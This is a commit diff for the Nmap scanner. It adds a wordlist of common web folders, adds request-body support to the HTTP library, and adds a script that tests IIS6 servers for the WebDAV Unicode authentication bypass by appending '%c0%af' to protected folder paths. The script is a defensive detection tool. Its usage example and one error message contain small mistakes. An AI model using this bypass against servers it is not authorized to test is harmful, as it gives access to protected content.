Added an initial WebDAV vulnerability-detection attempt for testing

nselib/data/folders.lst

@@ -0,0 +1,856 @@
+
+1
+10
+2
+3
+4
+5
+6
+7
+8
+9
+Admin_files
+AdvWebAdmin
+Agent
+Agents
+Album
+CS
+CVS
+DMR
+DocuColor
+GXApp
+HB
+HBTemplates
+I
+IBMWebAS
+JBookIt
+Msword
+NSearch
+NetDynamic
+NetDynamics
+News
+PDG_Cart
+ROADS
+Readme
+ScriptLibrary
+SilverStream
+StoreDB
+ToDo
+WS_FTP
+WebBank
+WebCalendar
+WebShop
+WebTrend
+Web_store
+XSL
+_pages
+a
+acceso
+access
+accesswatch
+acciones
+account
+accounting
+active
+activex
+adm
+admcgi
+admentor
+admin
+admin-bak
+admin-old
+admin.back
+adminWeb
+admin_
+administration
+administrator
+adminuser
+adminweb
+admisapi
+agentes
+allow
+analog
+anthill
+apache
+app
+appl
+applets
+application
+applications
+applmgr
+apply
+apps
+appsec
+ar
+archive
+archives
+asa
+asp
+atc
+aut
+auth
+authadmin
+author
+authors
+aw
+ayuda
+b
+b2-include
+back
+backend
+backup
+backups
+bad
+bak
+banca
+banco
+bank
+banner
+banner01
+banners
+bar
+batch
+bb-dnbd
+bbv
+bdata
+bdatos
+beta
+billpay
+bin
+binaries
+binary
+boadmin
+boot
+bottom
+browse
+browser
+bsd
+btauxdir
+bug
+bugs
+bugzilla
+buy
+buynow
+c
+cache
+cache-stats
+cached
+caja
+card
+cards
+cart
+cash
+caspsamp
+catalog
+cbi-bin
+ccard
+ccards
+cd
+cd-cgi
+cdrom
+ce_html
+cert
+certificado
+certificate
+cfappman
+cfdocs
+cfide
+cgi
+cgi-auth
+cgi-bin
+cgi-bin2
+cgi-csc
+cgi-lib
+cgi-local
+cgi-scripts
+cgi-shl
+cgi-shop
+cgi-sys
+cgi-weddico
+cgi-win
+cgibin
+cgilib
+cgis
+cgiscripts
+cgiwin
+class
+classes
+client
+cliente
+clientes
+clients
+cm
+cmsample
+cobalt-images
+code
+com
+comments
+common
+communicator
+comp
+company
+compra
+compras
+compressed
+conecta
+conf
+config
+configs
+configure
+connect
+console
+contact
+contacts
+content
+controlpanel
+core
+corp
+correo
+counter
+credit
+cron
+crons
+crypto
+csr
+css
+cuenta
+cuentas
+currency
+cust
+custom
+customer
+customers
+cvsweb
+cybercash
+d
+darkportal
+dat
+data
+database
+databases
+datafiles
+dato
+datos
+db
+dbase
+dcforum
+ddreport
+ddrint
+debug
+debugs
+default
+delete
+demo
+demoauct
+demomall
+demos
+demouser
+deny
+derived
+design
+dev
+devel
+development
+dir
+directories
+directory
+directorymanager
+dl
+dm
+dms
+dms0
+dmsdump
+doc
+doc-html
+doc1
+docs
+docs1
+document
+documentation
+documents
+down
+download
+downloads
+dump
+durep
+e
+easylog
+eforum
+ejemplo
+ejemplos
+email
+emailclass
+employees
+empoyees
+empris
+enter
+envia
+enviamail
+error
+errors
+es
+estmt
+etc
+example
+examples
+exc
+excel
+exchange
+exe
+exec
+exit
+export
+external
+extranet
+f
+failure
+fbsd
+fcgi
+fcgi-bin
+features
+file
+filemanager
+files
+find
+flash
+foldoc
+foo
+foobar
+form
+form-totaller
+forms
+formsmgr
+forum
+forums
+foto
+fotos
+fpadmin
+fpclass
+fpdb
+fpe
+fpsample
+frames
+framesets
+frontpage
+ftp
+ftproot
+fun
+func
+function
+functions
+g
+general
+gfx
+gif
+gifs
+global
+globals
+good
+graphics
+grocery
+guest
+guestbook
+guests
+h
+help
+helpdesk
+hidden
+hide
+hit_tracker
+hitmatic
+hlstats
+home
+host
+hosted
+hosting
+hostingcontroller
+ht
+htbin
+htdocs
+htm
+html
+http
+https
+hyperstat
+ibank
+ibill
+icons
+idea
+ideas
+iisadmin
+iissamples
+image
+imagenes
+imagery
+images
+img
+imp
+import
+impreso
+in
+inc
+include
+includes
+incoming
+index
+inet
+inf
+info
+information
+ingresa
+ingreso
+install
+internal
+internet
+intranet
+inventory
+invitado
+isapi
+j
+japidoc
+java
+javascript
+javasdk
+javatest
+jave
+jdbc
+job
+jrun
+js
+jsa
+jscript
+jserv
+jslib
+jsp
+junk
+k
+kiva
+known
+l
+labs
+lcgi
+lib
+libraries
+library
+libro
+license
+licenses
+links
+linux
+loader
+local
+location
+locations
+log
+logfile
+logfiles
+logg
+logger
+logging
+login
+logon
+logout
+logs
+lost+found
+m
+mail
+mail_log_files
+mailman
+mailroot
+makefile
+mall_log_files
+man
+manage
+management
+manager
+manual
+map
+maps
+marketing
+mem
+mem_bin
+member
+members
+message
+messaging
+metacart
+microsoft
+misc
+mkstats
+mod
+module
+modules
+movimientos
+mqseries
+ms
+msfpe
+msql
+my
+mysql
+mysql_admin
+n
+name
+names
+ncadmin
+nchelp
+ncsample
+net
+netbasic
+netcat
+netmagstats
+netscape
+netshare
+nettracker
+network
+new
+news
+nextgeneration
+nl
+notes
+noticias
+o
+objects
+odbc
+old
+old_files
+oldfiles
+oprocmgr-service
+oprocmgr-status
+oracle
+oradata
+order
+orders
+os
+out
+outgoing
+owners
+p
+page
+pages
+partner
+partners
+passport
+password
+passwords
+path
+payment
+payments
+pccsmysqladm
+perl
+perl5
+personal
+pforum
+phorum
+php
+phpBB
+phpMyAdmin
+phpmyadmin
+phpPhotoAlbum
+phpSecurePages
+php_classes
+phpclassifieds
+phpimageview
+phpnuke
+phpprojekt
+pics
+pictures
+pike
+piranha
+pls
+plsql
+poll
+polls
+portal
+portals
+postgres
+ppwb
+printers
+priv
+privacy
+privado
+private
+prod
+protected
+proxy
+prueba
+pruebas
+prv
+pub
+public
+publica
+publicar
+publico
+publish
+purchase
+purchases
+pw
+python
+q
+r
+random_banner
+rdp
+register
+registered
+registry
+remote
+remove
+report
+reports
+reseller
+restricted
+retail
+reveal
+reviews
+robot
+robots
+root
+rsrc
+ruby
+s
+sales
+sample
+samples
+save
+script
+scripts
+search
+search-ui
+sec
+secret
+secure
+secured
+security
+sell
+server
+server-info
+server-status
+server_stats
+servers
+serverstats
+service
+services
+servicio
+servicios
+servlet
+servlets
+session
+setup
+share
+shared
+sharedtemplates
+shell-cgi
+shipping
+shop
+shopper
+show
+site
+siteadmin
+sitemgr
+siteminder
+siteminderagent
+sites
+siteserver
+sitestats
+siteupdate
+smreports
+smreportsviewer
+soap
+soapdocs
+software
+solaris
+source
+sql
+squid
+src
+srchadm
+ssi
+ssl
+sslkeys
+staff
+stat
+state
+statistic
+statistics
+stats
+stats-bin-p
+stats_old
+status
+storage
+store
+storemgr
+stronghold-info
+stronghold-status
+stuff
+style
+styles
+stylesheet
+stylesheets
+subir
+sun
+super_stats
+supplier
+suppliers
+supply
+support
+supporter
+sys
+sysadmin
+sysbackup
+system
+systems
+t
+tar
+target
+tarjetas
+te_html
+tech
+technote
+temp
+template
+templates
+temporal
+test
+test-cgi
+testing
+tests
+testweb
+themes
+ticket
+tickets
+tip
+tips
+tmp
+tool
+tools
+top
+tpv
+trabajo
+track
+tracking
+transfer
+transito
+transpolar
+tree
+trees
+trick
+tricks
+u
+u02
+unix
+unknown
+updates
+upload
+uploads
+us
+usage
+user
+userdb
+users
+usr
+ustats
+usuario
+usuarios
+util
+utils
+v
+vendor
+vfs
+vti_bin
+vti_bot
+vti_log
+vti_pvt
+vti_shm
+vti_txt
+w
+w-agora
+w2000
+w2k
+w3perl
+way-board
+web
+web-inf
+web800fo
+webAdmin
+webDB
+webMathematica
+web_usage
+webaccess
+webadmin
+webalizer
+webapps
+webboard
+webcart
+webcart-lite
+webdata
+webdav
+webdb
+webimages
+webimages2
+weblog
+weblogs
+webmaster
+webmaster_logs
+webpub
+webpub-ui
+webreports
+webreps
+webshare
+website
+webstat
+webstats
+webtrace
+webtrends
+win
+win2k
+window
+windows
+word
+work
+world
+wsdocs
+wstats
+wusage
+www
+www-sql
+www0
+www2
+www3
+www4
+wwwjoin
+wwwlog
+wwwrooot
+wwwstat
+wwwstats
+x
+xGB
+xml
+xtemp
+y
+z
+zb41
+zip
+zipfiles
+winnt
+secure
+protected
+cgi-bin
+j2ee
+j2ee/examples
+j2ee/examples/jsp
+ojspdemos
+pls
+pls/sample
+pls/sample/admin
+pls/sample/admin_
+pls/sample/admin_/help
+recycler
+deleted
+tmp
+intranet
+network
+AlbumArt
+AlbumArt_
+My Shared Folder
+fileadmin
+webadmin
+content.ie5

nselib/http.lua

@@ -135,6 +135,7 @@ end
 -- @param options A table of options. It may have any of these fields:
 -- * <code>timeout</code>: A timeout used for socket operations.
 -- * <code>header</code>: A table containing additional headers to be used for the request.
+-- * <code>content</code>: The content of the message (content-length will be added -- set header['Content-Length'] to override)
 request = function( host, port, data, options )
   options = options or {}
 
@@ -158,8 +159,15 @@ request = function( host, port, data, options )
   for key, value in pairs(options.header or {}) do
     data = data .. key .. ": " .. value .. "\r\n"
   end
+  if(options.content ~= nil and options.header['Content-Length'] == nil) then
+    data = data .. "Content-Length: " .. string.len(options.content) .. "\r\n"
+  end
   data = data .. "\r\n"
 
+  if(options.content ~= nil) then
+    data = data .. options.content
+  end
+
   local result = {status=nil,["status-line"]=nil,header={},body=""}
   local socket = nmap.new_socket()
   local default_timeout = {}

scripts/http-webdav-unicode-bypass.nse

@@ -0,0 +1,167 @@
+description = [[
+This module is based on Metasplit's auxiliary module, modules/auxiliary/scanner/http/wmap_dir_webdav_unicode_bypass.rb. 
+It attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability 
+appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, 
+Digest or NTLM authentication.
+
+A list of well known folders is used (almost 900) by default. Each one is checked, and if returns an authentication
+request (401), another attempt is tried with the malicious encoding. If that attempt returns a successful result (207), 
+the folder is marked as vulnerable. 
+
+As of now, it takes about 13 seconds for me to scan a local server for every folder. 
+]]
+
+---
+-- @usage
+-- nmap --script smb-enum-users.nse -p445 <host>
+--
+-- @output
+-- 80/tcp open  http    syn-ack
+-- |_ http-webdav-unicode-bypass: Vulnerable folders discovered: /secret, /webdav
+--
+-- @args webdavfolder Selects a single folder to use, instead of using a built-in list
+-- @args folderdb The filename of an alternate list of folders.
+-- @args basefolder The folder to start in; eg, "/web" will try "/web/xxx"
+-----------------------------------------------------------------------
+
+author = "Ron Bowes <ron@skullsecurity.net>"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"discovery"}
+
+require "http"
+require "nsedebug"
+require "shortport"
+
+portrule = shortport.port_or_service({80, 8080}, "http")
+
+---Enumeration for results
+local enum_results = 
+{
+	VULNERABLE = 1,
+	NOT_VULNERABLE = 2,
+	UNKNOWN = 3
+}
+
+---Sends a PROPFIND request to the given host, and for the given folder. Returns a table reprenting a response. 
+local function get_response(host, port, folder)
+	local webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
+
+	local mod_options = {
+		header = {
+			Host = host.ip,
+			Connection = "close",
+			["User-Agent"]  = "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)",
+			["Content-Type"] = "application/xml",
+		},
+		content = webdav_req
+	}
+
+	return http.request(host, port, "PROPFIND " .. folder .. " HTTP/1.1\r\n", mod_options)
+end
+
+---Check a single folder on a single host for the vulnerability. Returns one of the enum_results codes. 
+local function go_single(host, port, folder)
+	local response
+
+	response = get_response(host, port, folder)
+	if(response.status == 401) then
+		local vuln_response
+
+		stdnse.print_debug(1, "http-webdav-unicode-bypass: Found protected folder (401): %s", folder)
+
+		vuln_response = get_response(host, port, folder .. "%c0%af")
+		if(vuln_response.status == 207) then
+			stdnse.print_debug(1, "http-webdav-unicode-bypass: Folder seems vulnerable: %s", folder)
+			return enum_results.VULNERABLE
+		else
+			stdnse.print_debug(2, "http-webdav-unicode-bypass: Folder not vulnerable: %s", folder)
+			return enum_results.NOT_VULNERABLE
+		end
+	else
+		stdnse.print_debug(3, "http-webdav-unicode-bypass: Not a protected folder (%s): %s", response['status-line'], folder)
+		return enum_results.UNKNOWN
+	end
+end
+
+---Checks a list of possible folders for the vulnerability. Returns a list of vulnerable folders. 
+local function go(host, port)
+	local status, folder
+	local results = {}
+	local is_vulnerable = true
+
+
+	local folder_file
+	if(nmap.registry.args.folderdb ~= nil) then
+		folder_file = nmap.fetchfile(nmap.registry.args.folderdb)
+	else
+		folder_file = nmap.fetchfile('nselib/data/folders.lst')
+	end
+
+	if(folder_file == nil) then
+		return false, "Couldn't find folders.lse (should be in nselib/data)"
+	end
+
+	local file = io.open(folder_file, "r")
+	if not file then
+		return false, "Couldn't find folders.lse (should be in nselib/data)"
+	end
+
+	while true do
+		local result
+		local line = file:read()
+		if not line then
+			break
+		end
+
+		if(nmap.registry.args.basefolder ~= nil) then
+			line = "/" .. nmap.registry.args.basefolder .. "/" .. line
+		else
+			line = "/" .. line
+		end
+
+		result = go_single(host, port, line)
+		if(result == enum_results.VULNERABLE) then
+			results[#results + 1] = line
+		elseif(result == enum_results.NOT_VULNERABLE) then
+			is_vulnerable = false
+		else
+		end
+	end
+
+	file:close()
+
+	return true, results, is_vulnerable
+end
+
+action = function(host, port)
+	if(nmap.registry.args.webdavfolder ~= nil) then
+		local folder = nmap.registry.args.webdavfolder
+		local result = go_single(host, port, "/" .. folder)
+
+		if(result == enum_results.VULNERABLE) then
+			return string.format("Folder is vulnerable: %s", folder)
+		elseif(result == enum_results.NOT_VULNERABLE) then
+			return string.format("Folder is NOT vulnerable: %s", folder)
+		else
+			return string.format("Could not determine vulnerability of folder: %s", folder)
+		end
+		
+	else
+		local status, results, is_vulnerable = go(host, port)
+	
+	    if(status == false) then
+			return "ERROR: " .. results
+		else
+			if(#results == 0) then
+				if(is_vulnerable == false) then
+					return "Server does not appear to be vulnerable."
+				else
+					return "No vulnerable folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=<path>"
+				end
+			else
+				return "Vulnerable folders discovered: " .. stdnse.strjoin(", ", results)
+			end
+		end
+	end
+end
+